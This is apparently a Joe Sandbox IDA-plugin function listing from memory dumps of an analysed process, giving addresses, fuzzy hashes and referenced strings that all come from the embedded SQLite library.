ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D814C2A
SELECT * FROM %Q.%Q, xrefs: 1D814B25

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
API String ID: 0-2013246442
Opcode ID: 5a94bc71bcbd5f463e213fb60b59dd9a46488a675593b6e53dcd7f4478c29697
Instruction ID: 4dc11ba9014f6afe6790b42729dc8e5553be7b7fee59715b94a20098fcfdf27b
Opcode Fuzzy Hash: 5a94bc71bcbd5f463e213fb60b59dd9a46488a675593b6e53dcd7f4478c29697
Instruction Fuzzy Hash: 95412975908215FFE7015F6DDC88FBB3768EF81665F010639FE059A212E731A90886B3

Function 1D8C7C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

winFullPathname2, xrefs: 1D8C7D35
winFullPathname1, xrefs: 1D8C7CC9
%s%c%s, xrefs: 1D8C7C7A

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s%c%s$winFullPathname1$winFullPathname2
API String ID: 0-2846052723
Opcode ID: f0c71ab2d38d036597fd753dae4ca5c93263a435a7ac77baa4ac6bd8570628f9
Instruction ID: 269b6d66136757a1898ef75528f501080f2f1208f910a5e5bd2eac96e48abc3e
Opcode Fuzzy Hash: f0c71ab2d38d036597fd753dae4ca5c93263a435a7ac77baa4ac6bd8570628f9
Instruction Fuzzy Hash: FC41E0A1A0C342FBEB107634FC84FB737A99F81135F15416DFA8A56052DB26E406C263

Function 1D814920 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 132COMMON

Download Yara Rule

Strings

Schema corrupt or not an rtree, xrefs: 1D8149DC
SELECT * FROM %Q.'%q_rowid', xrefs: 1D81496D
_parent, xrefs: 1D814A6D
_rowid, xrefs: 1D814A57
SELECT * FROM %Q.%Q, xrefs: 1D8149AA

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: SELECT * FROM %Q.%Q$SELECT * FROM %Q.'%q_rowid'$Schema corrupt or not an rtree$_parent$_rowid
API String ID: 0-2087119806
Opcode ID: 89084c60d63e8994209ac4986717b74e3fadba41869da76f3147510416f84424
Instruction ID: 9554018b7c93e80c490072dc46263b6fdeea8e051719bfdd9ee47efa30fdccd9
Opcode Fuzzy Hash: 89084c60d63e8994209ac4986717b74e3fadba41869da76f3147510416f84424
Instruction Fuzzy Hash: D541E1B5908341AFC704DBACDC8496F77E8AFD5614F02193EF685D7121E270E9488B93

Function 1D8BAAD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 130COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D8BAB15, 1D8BAB56, 1D8BABAA
API called with NULL prepared statement, xrefs: 1D8BAAD9
API called with finalized prepared statement, xrefs: 1D8BAAEF
%s at line %d of [%.10s], xrefs: 1D8BAB1A, 1D8BAB5B, 1D8BABAF
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D8BAB0B, 1D8BAB4C, 1D8BABA0
bind on a busy prepared statement: [%s], xrefs: 1D8BAB94

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3679126755
Opcode ID: edfc51102b65decc929a2f111b53d4c69006e5ec7ab19593212814e1da0b06f4
Instruction ID: d979ba46e2a6faba95688fbded3b0bf34daec5187a9bd804b587964813ce20dd
Opcode Fuzzy Hash: edfc51102b65decc929a2f111b53d4c69006e5ec7ab19593212814e1da0b06f4
Instruction Fuzzy Hash: B541D270614604EBE710CF68EC84FE7B3A5AF80316F064469F5A99B392E7A0E4408793

Function 1D85ECF0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 335COMMON

Download Yara Rule

Strings

docsize, xrefs: 1D85F020
content, xrefs: 1D85EFDF

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: content$docsize
API String ID: 0-1024698521
Opcode ID: 88961961bf3162633dff27eaf6d9a1048ca7ccf21ef63346cbac5160df396d60
Instruction ID: 500ab94c348d2980d4be3858190277f1ed1d002c720fd1206933ecd4a4891b0f
Opcode Fuzzy Hash: 88961961bf3162633dff27eaf6d9a1048ca7ccf21ef63346cbac5160df396d60
Instruction Fuzzy Hash: 8AC1D172908312ABC712CF14CC84B6BB3E4AF84364F458628FE4997261D775E855CB93

Function 1D7E5470 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

JSON cannot hold BLOB values, xrefs: 1D7E5697
%!0.15g, xrefs: 1D7E54D2
%lld, xrefs: 1D7E550D

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %!0.15g$%lld$JSON cannot hold BLOB values
API String ID: 0-1047910854
Opcode ID: b17e44b1d484362581c1aed03a74d6f7e7b2e97af1aadcfd06b97ca225b2e835
Instruction ID: 1e5e6a61dc2b6e1cea5a3b68beda101be12cb3944bf4ed160054ee56ce431145
Opcode Fuzzy Hash: b17e44b1d484362581c1aed03a74d6f7e7b2e97af1aadcfd06b97ca225b2e835
Instruction Fuzzy Hash: 2551EE7A508200BEE3105A18EC45FBA3766DF823B5F15024EFA4547293FB67F14142A3

Function 1D762B70 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

%c"%s", xrefs: 1D762C1B
,arg HIDDEN, xrefs: 1D762C7A
("%s", xrefs: 1D762C4A
ABLE x, xrefs: 1D762BB6
,schema HIDDEN, xrefs: 1D762CD2

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x
API String ID: 0-1763475469
Opcode ID: 2f7b14a94931ae1b4143a5df996387a72d9c8c2bcde7dee85738be7545d0739f
Instruction ID: f56b1b0622a4fd5dd5266e0b2f6225830de8cb27b08c9ba7d11ea676558f75d2
Opcode Fuzzy Hash: 2f7b14a94931ae1b4143a5df996387a72d9c8c2bcde7dee85738be7545d0739f
Instruction Fuzzy Hash: 9F71917480D3829BD310CF24D984B6ABBF0FF88314F008A5EE98897252E735E545CBA3

Function 1D7DAA40 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 334COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D7DAAC2, 1D7DAD8C
API called with NULL prepared statement, xrefs: 1D7DAA87
API called with finalized prepared statement, xrefs: 1D7DAA9C, 1D7DAD76
%s at line %d of [%.10s], xrefs: 1D7DAAC7, 1D7DAD91
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7DAAB8, 1D7DAD82

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 2a864d5afa0aab2932bd2a943013ed960cb69f3f9df9cc86a805e291d33420e1
Instruction ID: 3852e429968b8fbc31aeb1b3b983f02ca8cd58ca31f85ad75be332fd05e3d12f
Opcode Fuzzy Hash: 2a864d5afa0aab2932bd2a943013ed960cb69f3f9df9cc86a805e291d33420e1
Instruction Fuzzy Hash: A6B147B4A04B419FE750AF28DC44B6B77E4BF60339F04453EE99A87242E775E40587A3

Function 1D75A170 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

malformed JSON, xrefs: 1D75A283
JSON path error near '%q', xrefs: 1D75A3D7

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'$malformed JSON
API String ID: 0-560895927
Opcode ID: e8f38dfaf1ccd7023063209011facbe0b864143ddb3d6779d4ce6848a2315cad
Instruction ID: 1103c3ae0b7d4d8ec4bc866a178ea57fd7e7349aa634289e910d877411e7df7d
Opcode Fuzzy Hash: e8f38dfaf1ccd7023063209011facbe0b864143ddb3d6779d4ce6848a2315cad
Instruction Fuzzy Hash: 31A155B59043419BD710DF28D849B77B7E0AF80324F15853EE5898B252E736F94ACB93

Function 1D763D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

PRAGMA , xrefs: 1D763DC5
%Q., xrefs: 1D763E11
=%Q, xrefs: 1D763E7F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %Q.$=%Q$PRAGMA
API String ID: 0-2099833060
Opcode ID: c3627da3bf841fc8af4c3fcb5c87d994e4cc8f829b72b40bf289013395110c3d
Instruction ID: 0f68f1dbe336d0f72199485e80190ce96728ce03049af8032949c3ad60b51f63
Opcode Fuzzy Hash: c3627da3bf841fc8af4c3fcb5c87d994e4cc8f829b72b40bf289013395110c3d
Instruction Fuzzy Hash: CB71E4759082019BE700DF28DC84B6BB7B4AF44325F09466EFD459B252E736E905CBB3

Function 1D74B980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6acc0fbdf75e51adfe4d4156d06201ae1f5f84aa527b28e49faa79ea044630f
Instruction ID: 4dad376075babed9615201445b8195a9a04dc529ac4b61fe06de2a41b817056b
Opcode Fuzzy Hash: a6acc0fbdf75e51adfe4d4156d06201ae1f5f84aa527b28e49faa79ea044630f
Instruction Fuzzy Hash: 4A8145758083829BC7038F24988073BBBA0AF41220F65866EE8D917326DB35DC96C793

Function 1D78F600 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction ID: abc8659bc4ebfc3286ebb5c6d80c8414d2e45d83b7235f89232c6ae426e04726
Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction Fuzzy Hash: 2551C476A083016FE700DE14EC80B7BB7E8EF84734F45052EFA4597252E725EA598793

Function 1D7B1940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D7B1B21
%s at line %d of [%.10s], xrefs: 1D7B1B26
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7B1B17
block, xrefs: 1D7B1A90

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-4016964285
Opcode ID: 535958a01b68fd3f62f540152248f2365c2b34938b4f2fb4930d672b0140d35d
Instruction ID: 14af0e2256976a60b8d026d4f4cdb46415453af3f7babb2858480bdefc30536f
Opcode Fuzzy Hash: 535958a01b68fd3f62f540152248f2365c2b34938b4f2fb4930d672b0140d35d
Instruction Fuzzy Hash: A2C1EEB1904251DFDB10CF28E884B6A7BB4BF45764F05876AEC499B212E731E914CFA3

Function 1D75FED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

unknown error, xrefs: 1D76003E
%llu, xrefs: 1D75FFF7
abort due to ROLLBACK, xrefs: 1D760068
%llu, xrefs: 1D75FF3C
another row available, xrefs: 1D760076, 1D760081
no more rows available, xrefs: 1D76006F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 0-1539118790
Opcode ID: ac4846af415b5dadcd016410b5f6e93a66ff86f4c80538afb4bc07b497ffcb0e
Instruction ID: ef180400057145debc60182206644dd1997255367fa7c57550afcdb534a71926
Opcode Fuzzy Hash: ac4846af415b5dadcd016410b5f6e93a66ff86f4c80538afb4bc07b497ffcb0e
Instruction Fuzzy Hash: 9391E0716043209BD705CE18C884BAEB7F1BB85364F54462EFD899B391E736E846CB63

Function 1D8670B0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D867217
invalid rootpage, xrefs: 1D86715C, 1D86730E
orphan index, xrefs: 1D8672C2
API called with finalized prepared statement, xrefs: 1D867201
%s at line %d of [%.10s], xrefs: 1D86721C
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D86720D

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
